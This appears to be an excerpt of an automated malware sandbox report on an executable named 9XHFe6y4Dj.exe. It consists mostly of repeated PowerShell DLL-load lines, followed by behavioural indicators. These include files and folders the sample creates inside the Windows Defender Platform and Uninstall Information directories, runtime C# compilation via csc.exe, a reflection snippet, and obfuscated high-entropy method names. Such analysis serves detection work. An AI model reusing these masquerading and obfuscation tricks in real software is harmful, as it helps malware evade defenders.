                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                            Source: Window Recorder Window detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Directory created: C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Directory created: C:\Program Files\Windows Defender\Platform\bd46efcfcb9ccc
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Directory created: C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Directory created: C:\Program Files\Uninstall Information\bd46efcfcb9ccc
                            Source: 9XHFe6y4Dj.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: 9XHFe6y4Dj.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                            Source: 9XHFe6y4Dj.exe Static file information: File size 16272384 > 1048576
                            Source: 9XHFe6y4Dj.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x387400
                            Source: 9XHFe6y4Dj.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: 8C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.pdb source: 9XHFe6y4Dj.exe, 00000000.00000002.2210751988.000000000351C000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: 8C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.pdb source: 9XHFe6y4Dj.exe, 00000000.00000002.2210751988.000000000351C000.00000004.00000800.00020000.00000000.sdmp

                            Data Obfuscation

                            Source: 9XHFe6y4Dj.exe, PxYyBN7eGEjABOahheG.cs .Net Code: Type.GetTypeFromHandle(h15SPJ4uyJthUNbUclf.PycNoTjvZ4m(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(h15SPJ4uyJthUNbUclf.PycNoTjvZ4m(16777245)),Type.GetTypeFromHandle(h15SPJ4uyJthUNbUclf.PycNoTjvZ4m(16777259))})
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline"
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.cmdline"
                            Source: 9XHFe6y4Dj.exe, D0mDa371lrmYf14v8uC.csHigh entropy of concatenated method names: 'lDu7pxtCUs', 'Axy7ojJh3p', 't9ZKWYYB7Ll7K8OBUdEX', 'NkUZKXYBByytlCiwDkic', 'pfnMHuYBsS4bBvXFRW3K', 'cMm3D7YBxAs3TJvng0p6', 'FaSCP9YB4tLx2Gq3pA24', 'CQfBxPYBJXW6Bd0k3UP5', 'Y6h7NV9r7r', 'GEwXOIYBXmm8n1O8Zc4q'
                            Source: 9XHFe6y4Dj.exe, Pf8vfpWERF2fGVqGx5.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'yhekdVkxO'
                            Source: 9XHFe6y4Dj.exe, oCw2mep22ZmBjkD1ltI.csHigh entropy of concatenated method names: 'mYbp4WxB9N', 'L2X3RkY3N3e6AxwG3OdL', 'XQxr5XY3hdBGowG23oOR', 'U5eZBRY31RZNl0UPumjk', 'xov9sdY3YJPH6a7WW5KE', 'eu0VgAY30yNiq9cn6GtF', 'jFc7LwY3oge4hprAJU7l', 'MsohHrY3U9qm4psPQbYj', 'kIkLvEY3K9fUJ5yJMKQe', 'iKVoUwBLn5'
                            Source: 9XHFe6y4Dj.exe, BRkn8Cpi5FF0Zw5DJl7.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'L3I', 'k4cYKNqc7CT', 'yWOYpYaoQ3v', 'X4d5VHY8vDJlQ5SUptV9', 'L3NSqjY8OuGyn4CfA3Fd', 'NPtMwSY8ejfFFYlejXnl', 'E1ZKIBY8w5O6K6fQXKEN', 'dKmYcxY8iTAJXGyDBeFv'
                            Source: 9XHFe6y4Dj.exe, INL3n1IkvOvEABhhH7o.csHigh entropy of concatenated method names: 'nm1I5IivQX', 'uAwITmSmwI', 'GLKIfbLJDd', 'Wc0OG0YEkeN13EZ6qjG9', 'WvKlXCYEWKEbfV8siLFl', 't6mFpfYEtpHEN8NJv81Y', 'DFAdyyYEEDjIaeADx2hg', 'LNXl0AYE5RJgEK6GhXN6', 'ay197JYETxokZjfwBsKI', 'bsmpNXYEfltaE3TuPGP7'
                            Source: 9XHFe6y4Dj.exe, HIOEoTPFMZ1brXvQMXI.csHigh entropy of concatenated method names: 'I4IPxTTM4N', 'VFQP7k64rj', 'bPdPB8J6vc', 'IE6haEYkuHvyOTg523HT', 'tdGvTUYkS44KbqVLLahx', 'lVO2C5YkbrcEClqiVZZ7', 'oJVq77YkMpsmES1nDe8f', 'lAZojjYkvugwYsoCg6NQ', 'kDUZS8YkOHqeIHXA0jiR'
                            Source: 9XHFe6y4Dj.exe, xQJheCxClVORpvgBAIv.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'yirxHfUThC', 'PpRxWnRgny', 'p4dxtnoVdD', 'Dispose', 'IECc8KYBcsSwX3sp39TM', 'iK0QnMYBmqEO5QR3B8PW', 'ErNZKxYByLYERmnatAJe', 'LoZ7PfYBVX7xgOTtvgds'
                            Source: 9XHFe6y4Dj.exe, J950ChNf9SdsZMpS4Kh.csHigh entropy of concatenated method names: 'A2Wh0ie7ym', 'BNKjLRYIxqVJBq2LHorJ', 'fpRnQoYI7j3tJyxlK4bO', 'zcHRMSYIBScR91DsQvXy', 'MOwNJTYIF9JYO9o8TMYd', 'Lw68f8YIs9u8m23PR0SN', 'qEkyGOYI4XX0wH7IiPHU', 'JvRQfcYIJupXcdSnChZx', 'dm6h1crwM6', 'FhThNW4Whb'
                            Source: 9XHFe6y4Dj.exe, OnteC7pdB2BTfLBhZFS.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'Qa8YKpP6lFP', 'yWOYpYaoQ3v', 'HSKVSMY88PJnuZlrMpyJ', 'CyIfwBY83MbVpAbUYBww', 'HwXsJHY8dht9yTpO9P0r', 'MR0eD6Y8ZiGUSqHXgoR9', 'uyHj72Y8cVE2YAuaDUi0'
                            Source: 9XHFe6y4Dj.exe, vKHRqgYJHueweMMvgFw.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'SXWYKYO6geO', 'yWOYpYaoQ3v', 'GwiKCWYaBiFqCZtpB40W', 'EypH9EYa4vQGMwqhIKTD', 'syIRB2YaJanVKd4ioF2y', 'mVIJCJYazj94JN8unu4N'
                            Source: 9XHFe6y4Dj.exe, BerlY0gCGL47gS9OTdV.csHigh entropy of concatenated method names: 'wBDgHUiPcB', 'OJ6gW5dNhT', 'F9dgtjThcZ', 'D6JgkQloLG', 'tG5gEua6rY', 'eSIg5ilaAb', 'iomgTx5Uvx', 'FBwgfofZdX', 'Tk0gXLwRaf', 'ExcgDUI7ii'
                            Source: 9XHFe6y4Dj.exe, eNgjHCKkiCF6B5xtrEj.csHigh entropy of concatenated method names: 'rRVKxbn7l4', 'uOqoJuYmReeNJ7OFYLuf', 'k99yGCYmKCQSvXZ20Njg', 'gdRSDnYm6C1lAZxA44Af', 'Vo13upYm9FYWjV9QkKDx', 'fmiiNgYmSn7AHGV5VakA', 'P9X', 'vmethod_0', 'Hu9Ypa1YWJr', 'imethod_0'
                            Source: 9XHFe6y4Dj.exe, VftcS2cfKYbroBgTC6l.csHigh entropy of concatenated method names: 'aRmLRFYD6mU5SZM5rUCm', 'GmxL6IYDR8WB1PJ2cJQh', 'SC3cDm9hHK', 'Mh9', 'method_0', 'dkVcFvqiBy', 'ouQcs5ZWgn', 'N8icxfJET9', 'kVTc7tP2uS', 'pQxcB52Jcq'
                            Source: 9XHFe6y4Dj.exe, QkDB7cAbwwIbaq9T6PX.csHigh entropy of concatenated method names: 'OAnLYsfgBK', 'pnJ0wBYW8U3ekuNtIEqO', 'PYIHXfYW3VjJbmkNPJlc', 'mQfL2eYWdGJLVeRPCvow', 'yWOAMG1tKP', 'D6sAvSjx6M', 'CpYAOk6bKQ', 'KxNAeHcyKk', 'LN9Aw56vPw', 'jiBAip5i8d'
                            Source: 9XHFe6y4Dj.exe, qMNoDl6NFae3Rwlae8v.csHigh entropy of concatenated method names: 'bCK6psfeIl', 'LAc6ohQCUy', 'vCb6UaFGNK', 'Nyc60jR6Na', 'zdu6KE0Y4e', 'pJe66HYWSo', 'WqL6RR8iGD', 'mue69H2GBO', 'Qpa6S4jMFk', 'gCt6btqqdr'
                            Source: 9XHFe6y4Dj.exe, FQRe3axbxOh9Mrh1b5N.csHigh entropy of concatenated method names: 'xtnxvJmUUA', 'asdxioKlFd', 'v0HxA3FZRG', 'vmLxGcQbvN', 'tqjxL4tUKI', 'kfDxq4Jt6T', 'BoOxPDwu3y', 'a3CxloUlY7', 'Dispose', 'yrWhesYBeip3n9MkmjAP'
                            Source: 9XHFe6y4Dj.exe, pEbIjOPLgMLK7ma3888.csHigh entropy of concatenated method names: 'zaAPPlenyv', 'OxXPl5ZJQB', 'lq0PaoADFY', 'JwmPInTZHV', 'modPgUJgZa', 'sXjNo2Yt4XEHBcKypaxv', 'tw0cBhYtJ5oBm1dcfR5O', 'XFjFJgYtzxvT2AyNLuN2', 'MJjxCcYk1kQ0G5iW7PFe', 'tP8aC7YkYlTeaJKmtLe5'
                            Source: 9XHFe6y4Dj.exe, Us5gVv8JRu44Ob5Rd8L.csHigh entropy of concatenated method names: 'yXE31TwDRC', 'B7I3YPWNp6', 'Yd7', 'UO43N18br7', 'CmQ3hPrF1T', 'tFr3pK6DWj', 'nwJ3ogAZgt', 'SjhQBfYTzGAdRSrPXfA1', 'qfvAKqYT4lxep4XRp0QH', 'vtxtZTYTJ5heMdO8eL48'
                            Source: 9XHFe6y4Dj.exe, f7NxsaNnVjkTKCTTGX8.csHigh entropy of concatenated method names: 'lGiNA0kJLs', 'kJgNGpumsI', 'hUcZ0vYIGcuH34aG081K', 'XtnBXVYIQnW3HGcHt5HC', 'AgBCHOYIALkwwN3yBPw2', 'NT9yX7YILQ2OSxAnVEML', 'gVZDSoYIq68JR3nxBhS5', 'pT75c6YIPRVa84US1r9D', 'cUiM4EYIlLg30QUrHj15'
                            Source: 9XHFe6y4Dj.exe, F5gxo2LXqPPwjRq1RCB.csHigh entropy of concatenated method names: 'fAGLFya3i5', 'LlWLsQjbcF', 'YMeLxi3eNk', 'B3tL7xqd87', 'NlkLBJrFJj', 'fVR8QLYWJ0EhugkxaiQA', 'Nn6MaCYWBL4BDhljlfkk', 'Hh4u44YW4qo8kbDp406o', 'FXURkZYWzA0gsiVEGwc3', 'ciRlG4Yt1GrVXKL58sbn'
                            Source: 9XHFe6y4Dj.exe, U0FhyT0j89W2mgFnT48.csHigh entropy of concatenated method names: 'Ir60xUC41y', 'LXj07htKj0', 'dxLvAnYc0DrOsrOt7irt', 'Fdqt7aYcoTwdKOM9WBF8', 'vpUdHOYcU4IKqJfK9VdM', 'fI30WSiIR7', 'Omy0tELDbW', 'B3O0kdngvQ', 'Tc70EjyuwI', 'S3005AASuB'
                            Source: 9XHFe6y4Dj.exe, JKxWDbhlfu7pVx8ZZK9.csHigh entropy of concatenated method names: 'mqyhHUlihg', 'mGLhWWoi8X', 'GIchtZQDDf', 'jEnV6JYgrfqvuZRZVEan', 'I5Hp4DYg25JvnPnGUDkE', 'XWw4k8YgyHVcK6ICJoVD', 'OuL2PLYgVVtuLMSqOw2V', 'EBJhIyiVTY', 'oyMhgnp5HY', 'ShDh8syxdH'
